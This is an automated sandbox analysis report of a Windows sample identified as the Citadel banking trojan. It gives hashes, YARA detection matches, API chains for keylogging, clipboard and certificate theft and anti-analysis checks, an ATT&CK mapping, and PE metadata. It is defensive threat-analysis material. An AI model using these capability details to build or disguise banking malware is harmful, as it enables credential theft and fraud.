
Analysis Report executable.4080.exe

Overview

General Information

Sample Name: executable.4080.exe
Analysis ID: 358585
MD5: 9b6886089b69bc227e48accb63231096
SHA1: 3794deb61672f08dcd4997b18780d3a0b81340fb
SHA256: f7c242fef888f7129e510c5a2c2a9a3ada69891304017e93a235cd3148d0dde4

Detection

Citadel
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Citadel
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May initialize a security null descriptor
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • executable.4080.exe (PID: 5424 cmdline: 'C:\Users\user\Desktop\executable.4080.exe' MD5: 9B6886089B69BC227E48ACCB63231096)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
executable.4080.exe | JoeSecurity_Citadel | Yara detected Citadel | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp | JoeSecurity_Citadel | Yara detected Citadel | Joe Security |
00000000.00000000.197550286.0000000000401000.00000020.00020000.sdmp | JoeSecurity_Citadel | Yara detected Citadel | Joe Security |
Process Memory Space: executable.4080.exe PID: 5424 | JoeSecurity_Citadel | Yara detected Citadel | Joe Security |
Process Memory Space: executable.4080.exe PID: 5424 | citadel13xy | Citadel 1.5.x.y trojan banker | Jean-Philippe Teissier / @Jipe_ | matched strings listed below
  • 0x1b8a:$f: bc_remove
  • 0x8786:$f: bc_remove
  • 0x10a3b:$f: bc_remove
  • 0x2298:$g: bc_add
  • 0x8793:$g: bc_add
  • 0x10a48:$g: bc_add
  • 0x2987:$ggurl: http://www.google.com/webhp
  • 0x4b85:$ggurl: http://www.google.com/webhp
  • 0x7ed0:$ggurl: http://www.google.com/webhp
  • 0x8022:$ggurl: http://www.google.com/webhp
  • 0x10185:$ggurl: http://www.google.com/webhp
  • 0x102d7:$ggurl: http://www.google.com/webhp

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.executable.4080.exe.400000.0.unpack | JoeSecurity_Citadel | Yara detected Citadel | Joe Security |
0.0.executable.4080.exe.400000.0.unpack | JoeSecurity_Citadel | Yara detected Citadel | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: executable.4080.exe; Avira: detected
Multi AV Scanner detection for submitted file
Source: executable.4080.exe; Virustotal: Detection: 84%
Source: executable.4080.exe; ReversingLabs: Detection: 82%
Machine Learning detection for sample
Source: executable.4080.exe; Joe Sandbox ML: detected
Source: 0.1.executable.4080.exe.400000.0.unpack; Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.2.executable.4080.exe.400000.0.unpack; Avira: Label: TR/Spy.Gen
Source: 0.0.executable.4080.exe.400000.0.unpack; Avira: Label: TR/Spy.Gen
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040B74D CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext

Compliance:

Uses 32bit PE files
Source: executable.4080.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_00408C33 GetFileAttributesExW,LoadLibraryA,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,ReadProcessMemory,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040B41D FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040B4D8 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040AC31 CreateFileW,HeapAlloc,WaitForSingleObject,InternetReadFile,WriteFile,FlushFileBuffers,CloseHandle
Source: executable.4080.exe; String found in binary or memory: http://www.google.com/webhp
Source: executable.4080.exe; String found in binary or memory: http://www.google.com/webhpbccerts

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Citadel
Source: Yara match; File source: executable.4080.exe, type: SAMPLE
Source: Yara match; File source: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.197550286.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: executable.4080.exe PID: 5424, type: MEMORY
Source: Yara match; File source: 0.2.executable.4080.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.executable.4080.exe.400000.0.unpack, type: UNPACKEDPE
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_00412C03 GetClipboardData,GlobalLock,EnterCriticalSection,LeaveCriticalSection,GlobalUnlock
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_00412AC1 EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage

E-Banking Fraud:

Yara detected Citadel
Source: Yara match; File source: executable.4080.exe, type: SAMPLE
Source: Yara match; File source: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.197550286.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: executable.4080.exe PID: 5424, type: MEMORY
Source: Yara match; File source: 0.2.executable.4080.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.executable.4080.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: Process Memory Space: executable.4080.exe PID: 5424, type: MEMORY; Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040344C NtQueryInformationProcess,CloseHandle,NtCreateThread
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_00404CCE NtCreateUserProcess,NtCreateThread,LdrLoadDll,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,TranslateMessage,GetClipboardData,PFXImportCertStore
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_004034F6 NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040F61D LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_00415300 InitiateSystemShutdownExW,ExitWindowsEx
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040C570
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040B65A
Source: executable.4080.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: Process Memory Space: executable.4080.exe PID: 5424, type: MEMORY; Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: classification engine; Classification label: mal80.bank.evad.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0041267A CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_004127BF CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040F3C3 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040F36F CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0041000E CoCreateInstance
Source: executable.4080.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\executable.4080.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: executable.4080.exe; Virustotal: Detection: 84%
Source: executable.4080.exe; ReversingLabs: Detection: 82%
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_00411408 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_00408610 push ss; ret 0_2_00408798
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_00405841 HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040540A HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\Desktop\executable.4080.exe; Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_0-9667)
Source: C:\Users\user\Desktop\executable.4080.exe; Evasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_0-9667)
Source: C:\Users\user\Desktop\executable.4080.exe; Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess (graph_0-9759)
Source: C:\Users\user\Desktop\executable.4080.exe; Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_0-9822)
Source: C:\Users\user\Desktop\executable.4080.exe; API coverage: 2.1 %
Source: all processes; Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040B41D FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040B4D8 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_00404CCE NtCreateUserProcess,NtCreateThread,LdrLoadDll,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,TranslateMessage,GetClipboardData,PFXImportCertStore
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_00404ACF VirtualProtectEx 000000FF,0774C084,0000001E,00407798,00407798
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_00411408 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040EBCB mov edx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040779B HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,GetLengthSid,GetCurrentProcessId
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040DB47 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0041280F PFXImportCertStore,GetSystemTime
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_00411A9D GetTickCount,GetUserDefaultUILanguage,GetModuleFileNameW,GetUserNameExW
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_00409921 GetTimeZoneInformation
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040F810 GetVersionExW,GetNativeSystemInfo
Source: executable.4080.exe; Binary or memory string: S:(ML;;NRNWNX;;;LW)
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040CC51 HeapAlloc,socket,bind,closesocket
Source: C:\Users\user\Desktop\executable.4080.exe; Code function: 0_2_0040C961 socket,bind,listen,closesocket

Mitre Att&ck Matrix

(Numbers after a technique name give the count of matching signatures; cells without a number are unmatched matrix entries.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts 1 | Native API 13 | Valid Accounts 1 | Valid Accounts 1 | Valid Accounts 1 | Input Capture 11 | Network Share Discovery 1 | Remote Services | Input Capture 11 | Exfiltration Over Other Network Medium | Encrypted Channel 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
Default Accounts | Scheduled Task/Job | Application Shimming 1 | Access Token Manipulation 11 | Disable or Modify Tools 1 | LSASS Memory | System Time Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Application Shimming 1 | Access Token Manipulation 11 | Security Account Manager | Security Software Discovery 1 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Process Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Install Root Certificate 1 | LSA Secrets | Account Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 1 | Cached Domain Credentials | System Owner/User Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 3 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

Behavior Graph

Screenshots

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
executable.4080.exe | 84% | Virustotal |
executable.4080.exe | 82% | ReversingLabs | Win32.Trojan.Zeus
executable.4080.exe | 100% | Avira | TR/Spy.Gen
executable.4080.exe | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
0.1.executable.4080.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
0.2.executable.4080.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen
0.0.executable.4080.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 358585
Start date: 25.02.2021
Start time: 21:50:45
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 2m 31s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: executable.4080.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal80.bank.evad.winEXE@1/0@0/0
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 99.8% (good quality ratio 95.5%)
• Quality average: 86.7%
• Quality standard deviation: 24.9%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
Warnings:
• Exclude process from analysis (whitelisted): svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type: MS-DOS executable
Entropy (8bit): 6.281631730900597
TrID:
• Win32 Executable (generic) a (10002005/4) 99.94%
• DOS Executable Borland Pascal 7.0x (2037/25) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
File name: executable.4080.exe
File size: 118784
MD5: 9b6886089b69bc227e48accb63231096
SHA1: 3794deb61672f08dcd4997b18780d3a0b81340fb
SHA256: f7c242fef888f7129e510c5a2c2a9a3ada69891304017e93a235cd3148d0dde4
SHA512: 7aec380c70624cd5336f23421aa2e2899d75b9b2098deb1dc8045ad27411919c032173662ccea468c68aa0702d8f9f373030eb821fea9e50e17759e8a9df9e7e
SSDEEP: 1536:D1fuot6xHoU2Qw6bQLsUPJEqz6ohfUOcgrZi0NwuMoVEcO9fipsdtAe1zIq3/VzD:hLIxHZRbMsZ/oh8/wlNhidtA8I8VzD
File Content Preview: MZ..............................................................................................................................................................................................................................PE..L......K.................~.

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x407f7f
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp: 0x4BDF10B5 [Mon May 3 18:06:45 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: b14de3ce0d2ae45019008e4128864503

Entrypoint Preview

Instruction
push ebp
lea ebp, dword ptr [esp-78h]
sub esp, 00000298h
push ebx
xor ebx, ebx
push ebx
mov byte ptr [ebp+77h], bl
call 00007F0D3CB9271Ah
test al, al
je 00007F0D3CB93247h
push 00008007h
mov byte ptr [ebp+5Ch], bl
mov byte ptr [ebp+76h], 00000001h
call dword ptr [004011D4h]
lea eax, dword ptr [ebp+6Ch]
push eax
call dword ptr [004011D8h]
push eax
call dword ptr [00401260h]
cmp eax, ebx
je 00007F0D3CB92F4Ah
xor edx, edx
cmp dword ptr [ebp+6Ch], ebx
jle 00007F0D3CB92F3Ch
mov ecx, dword ptr [eax+edx*4]
cmp ecx, ebx
je 00007F0D3CB92F2Fh
cmp word ptr [ecx], 002Dh
jne 00007F0D3CB92F29h
movzx ecx, word ptr [ecx+02h]
cmp ecx, 66h
je 00007F0D3CB92F1Ch
cmp ecx, 6Eh
jne 00007F0D3CB92F1Bh
mov byte ptr [ebp+76h], bl
jmp 00007F0D3CB92F16h
mov byte ptr [ebp+5Ch], 00000001h
inc edx
cmp edx, dword ptr [ebp+6Ch]
jl 00007F0D3CB92EE8h
push eax
call dword ptr [004011ACh]
push esi
push edi
push dword ptr [0041932Ch]
xor eax, eax
lea esi, dword ptr [ebp+60h]
call 00007F0D3CB95F4Ch
test al, al
je 00007F0D3CB92F2Ch
mov ecx, dword ptr [ebp+60h]
lea eax, dword ptr [ebp+70h]
push eax
lea eax, dword ptr [ebp+6Ch]
push eax
mov eax, dword ptr [ebp+64h]
call 00007F0D3CB92BF3h
mov eax, esi
call 00007F0D3CB95FD6h
cmp dword ptr [ebp+70h], 000001E6h
jne 00007F0D3CB92FAEh
push dword ptr [ebp+6Ch]
call 00007F0D3CB93776h
test al, al
je 00007F0D3CB92F75h

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x177c4 | 0x104 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1b000 | 0xd5c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x3e8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x18000 | 0x18000 | False | 0.610392252604 | data | 6.56580621678 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x19000 | 0x2000 | 0x2000 | False | 0.568969726562 | data | 5.33094975112 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc | 0x1b000 | 0x2000 | 0x2000 | False | 0.363159179688 | data | 3.6749722075 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Imports

              DLL | Import
              KERNEL32.dll | lstrcmpiA, LoadLibraryA, WTSGetActiveConsoleSessionId, SetFileAttributesW, GetCurrentThread, SetThreadPriority, GetEnvironmentVariableW, FileTimeToDosDateTime, GetTempFileNameW, HeapReAlloc, CreateMutexW, FindFirstFileW, GetNativeSystemInfo, SetEndOfFile, CreateProcessW, HeapAlloc, SystemTimeToFileTime, SetFilePointerEx, HeapFree, GetComputerNameW, GetTickCount, GetProcessHeap, IsBadReadPtr, SetFileTime, VirtualQueryEx, WriteFile, OpenProcess, Thread32First, WideCharToMultiByte, ReadProcessMemory, GetVersionExW, CreateFileW, OpenEventW, Thread32Next, ReadFile, GetTimeZoneInformation, MultiByteToWideChar, FlushFileBuffers, GetTempPathW, GetFileSizeEx, OpenMutexW, GetLastError, SetLastError, VirtualProtectEx, VirtualAllocEx, FindClose, RemoveDirectoryW, FindNextFileW, VirtualProtect, CreateToolhelp32Snapshot, GetFileTime, ReleaseMutex, FileTimeToLocalFileTime, GetVolumeNameForVolumeMountPointW, DeleteFileW, GetFileInformationByHandle, MoveFileExW, GetUserDefaultUILanguage, GlobalLock, GlobalUnlock, CreateRemoteThread, Process32FirstW, Process32NextW, GetFileAttributesW, CreateDirectoryW, FreeLibrary, WriteProcessMemory, LocalFree, GetCurrentProcessId, HeapDestroy, DuplicateHandle, WaitForMultipleObjects, CreateEventW, GetModuleFileNameW, Sleep, VirtualFree, WaitForSingleObject, SetErrorMode, GetCommandLineW, ExitProcess, ExpandEnvironmentStringsW, GetPrivateProfileIntW, GetPrivateProfileStringW, lstrcmpiW, GetThreadContext, ResetEvent, GetProcAddress, GetModuleHandleW, SetEvent, CreateThread, GetSystemTime, GetLocalTime, CloseHandle, GetFileAttributesExW, GetProcessId, EnterCriticalSection, VirtualAlloc, LeaveCriticalSection, VirtualFreeEx, InitializeCriticalSection, SetThreadContext, HeapCreate
              USER32.dll | GetCursorPos, GetIconInfo, DrawIcon, LoadImageW, CharLowerW, ToUnicode, GetKeyboardState, ExitWindowsEx, MsgWaitForMultipleObjects, GetClipboardData, TranslateMessage, CharToOemW, CharLowerBuffA, DispatchMessageW, CharUpperW, PeekMessageW, CharLowerA
              ADVAPI32.dll | GetLengthSid, LookupPrivilegeValueW, SetNamedSecurityInfoW, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, CreateProcessAsUserW, RegQueryValueExW, CryptReleaseContext, RegCreateKeyExW, GetTokenInformation, GetSidSubAuthorityCount, OpenThreadToken, CryptAcquireContextW, GetSidSubAuthority, OpenProcessToken, CryptGetHashParam, EqualSid, IsWellKnownSid, RegCloseKey, RegEnumKeyExW, RegOpenKeyExW, ConvertStringSecurityDescriptorToSecurityDescriptorW, GetSecurityDescriptorSacl, SetSecurityDescriptorSacl, CryptDestroyHash, AdjustTokenPrivileges, ConvertSidToStringSidW, RegSetValueExW, CryptHashData, InitiateSystemShutdownExW, CryptCreateHash
              SHLWAPI.dll | wvnsprintfW, PathIsDirectoryW, PathFindFileNameW, PathAddBackslashW, SHDeleteValueW, PathSkipRootW, SHDeleteKeyW, PathRemoveFileSpecW, UrlUnescapeA, StrStrIA, PathMatchSpecW, StrCmpNIA, wvnsprintfA, PathUnquoteSpacesW, PathIsURLW, PathQuoteSpacesW, StrCmpNIW, PathRemoveBackslashW, PathAddExtensionW, StrStrIW, PathCombineW, PathRenameExtensionW
              SHELL32.dll | CommandLineToArgvW, SHGetFolderPathW, ShellExecuteW
              Secur32.dll | GetUserNameExW
              ole32.dll | StringFromGUID2, CLSIDFromString, CoUninitialize, CoCreateInstance, CoInitializeEx
              WS2_32.dll | accept, listen, WSASend, WSASetLastError, socket, recv, bind, WSAEventSelect, WSAIoctl, connect, WSAAddressToStringW, WSAStartup, recvfrom, getaddrinfo, select, WSAGetLastError, getsockname, shutdown, setsockopt, sendto, getpeername, closesocket, send, freeaddrinfo
              CRYPT32.dll | PFXImportCertStore, CertOpenSystemStoreW, CertCloseStore, CertEnumCertificatesInStore, CertDuplicateCertificateContext, PFXExportCertStoreEx, CertDeleteCertificateFromStore
              WININET.dll | InternetCrackUrlA, HttpAddRequestHeadersW, InternetSetStatusCallbackW, GetUrlCacheEntryInfoW, InternetQueryOptionA, InternetSetOptionA, HttpSendRequestW, InternetReadFile, InternetReadFileExA, InternetQueryDataAvailable, HttpSendRequestExW, HttpSendRequestExA, InternetCloseHandle, InternetOpenA, HttpSendRequestA, HttpAddRequestHeadersA, HttpOpenRequestA, InternetConnectA, HttpQueryInfoA
              OLEAUT32.dll | VariantInit, VariantClear, SysAllocString, SysFreeString
